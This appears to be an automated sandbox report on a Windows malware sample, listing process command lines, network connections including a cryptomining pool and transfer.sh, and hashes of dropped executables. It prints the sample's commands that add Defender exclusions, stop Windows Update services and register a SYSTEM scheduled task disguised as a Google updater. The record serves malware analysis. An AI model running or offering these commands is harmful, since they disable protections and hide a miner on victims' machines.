"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1232 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1884 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2396 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1728 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2540 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=52590 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2668 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2664 --field-trial-handle=996,i,10152862500741544982,16434502501430771049,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {CA43C103-1722-4163-8F54-4C44D4F58FA3} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-11775245162040761005-554534607-157596740141596971-235724060-1954840179585178591"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 209.250.248.11:33522 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.68:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.214:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.34:443 googleads.g.doubleclick.net tcp
NL 142.251.36.34:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 i2.ytimg.com udp
NL 142.250.179.174:443 i2.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.214:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp

Files

memory/2568-54-0x0000000000290000-0x00000000002CF000-memory.dmp

memory/2568-53-0x0000000000220000-0x0000000000249000-memory.dmp

memory/2568-55-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/2568-56-0x00000000746A0000-0x0000000074D8E000-memory.dmp

memory/2568-57-0x0000000003500000-0x0000000003540000-memory.dmp

memory/2568-58-0x0000000003590000-0x00000000035C8000-memory.dmp

memory/2568-59-0x0000000003500000-0x0000000003540000-memory.dmp

memory/2568-60-0x0000000003500000-0x0000000003540000-memory.dmp

memory/2568-61-0x00000000034D0000-0x0000000003504000-memory.dmp

memory/2568-62-0x00000000019F0000-0x00000000019F6000-memory.dmp

memory/2568-63-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/2568-64-0x0000000000220000-0x0000000000249000-memory.dmp

memory/2568-65-0x0000000003500000-0x0000000003540000-memory.dmp

memory/2568-66-0x0000000000290000-0x00000000002CF000-memory.dmp

memory/2568-67-0x00000000746A0000-0x0000000074D8E000-memory.dmp

memory/2568-68-0x0000000003500000-0x0000000003540000-memory.dmp

memory/2568-70-0x0000000003500000-0x0000000003540000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab1F26.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\Tar1F77.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4a00db671642b5e8d86a3adfc923e830
SHA1 64aaf6d5b185abd0be596ee87c57d4401e7e299e
SHA256 ed4383a22ae3f4d0dd8812a50fa76460e5767ea0d4d0d221349a2560bc1e6d69
SHA512 66560dfec4e2954d66ee3e1ebcb76d3f3869b4ac255a5d314798e2988a133fc37d76f85ca65410df81a543d0dfbec3facd141cd96c599d5824903d23e6d3e3f4

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2568-144-0x000000000D2F0000-0x000000000D57B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1892-147-0x00000000012F0000-0x000000000157B000-memory.dmp

memory/1892-148-0x00000000012F0000-0x000000000157B000-memory.dmp

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2544-157-0x0000000004600000-0x0000000005826000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/3056-162-0x000000013FF30000-0x0000000141156000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2568-165-0x000000000D2F0000-0x000000000D924000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/3000-166-0x00000000011B0000-0x00000000017E4000-memory.dmp

memory/3000-167-0x00000000778A0000-0x00000000778A2000-memory.dmp

memory/3000-168-0x00000000011B0000-0x00000000017E4000-memory.dmp

memory/3056-169-0x00000000776B0000-0x0000000077859000-memory.dmp

memory/2568-170-0x0000000000400000-0x00000000018CD000-memory.dmp

memory/3000-172-0x00000000001B0000-0x0000000000220000-memory.dmp

memory/3056-171-0x000000013FF30000-0x0000000141156000-memory.dmp

memory/2568-173-0x00000000746A0000-0x0000000074D8E000-memory.dmp

memory/3000-175-0x0000000002FF0000-0x000000000305C000-memory.dmp

memory/3000-177-0x0000000003220000-0x0000000003260000-memory.dmp

memory/3000-174-0x00000000746A0000-0x0000000074D8E000-memory.dmp

memory/3000-179-0x0000000003220000-0x0000000003260000-memory.dmp

memory/3056-176-0x000000013FF30000-0x0000000141156000-memory.dmp

memory/3000-178-0x0000000003220000-0x0000000003260000-memory.dmp

memory/3056-180-0x000000013FF30000-0x0000000141156000-memory.dmp

memory/3056-181-0x000000013FF30000-0x0000000141156000-memory.dmp

memory/3000-183-0x00000000057E0000-0x0000000005892000-memory.dmp

memory/3056-182-0x000000013FF30000-0x0000000141156000-memory.dmp

memory/3056-184-0x000000013FF30000-0x0000000141156000-memory.dmp

memory/3016-185-0x0000000000170000-0x0000000000297000-memory.dmp

memory/3016-186-0x0000000000170000-0x0000000000297000-memory.dmp

memory/3016-192-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/3016-194-0x0000000000170000-0x0000000000297000-memory.dmp

memory/3016-195-0x0000000000170000-0x0000000000297000-memory.dmp

memory/3016-196-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3016-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3016-203-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-211-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-230-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-234-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-238-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-248-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-249-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-243-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-256-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-261-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-264-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-263-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-258-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-255-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-254-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-250-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-241-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3000-293-0x00000000011B0000-0x00000000017E4000-memory.dmp

memory/3016-239-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-236-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-235-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-209-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/3016-208-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3016-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/3016-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Local State

MD5 061d9e5553a1ab85f95117a8d9857d6f
SHA1 3aaa0f216a78799191f798aa97ee909188c6aad3
SHA256 0a3f27b98e18972bfde240268a8ad669ee026c0dad5d413225aefd4c623045e9
SHA512 893b847265e6bf76bab3ee1f9b726d8877e019c81c1e04bd56f42e1e7e59cc37098e2940357be9840cd947e117457bf748e5a61ea5bce2c0e595e5737b1f3b1a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataUVL64\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

\??\pipe\crashpad_2572_JVPFHDBLTYTBTJIX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
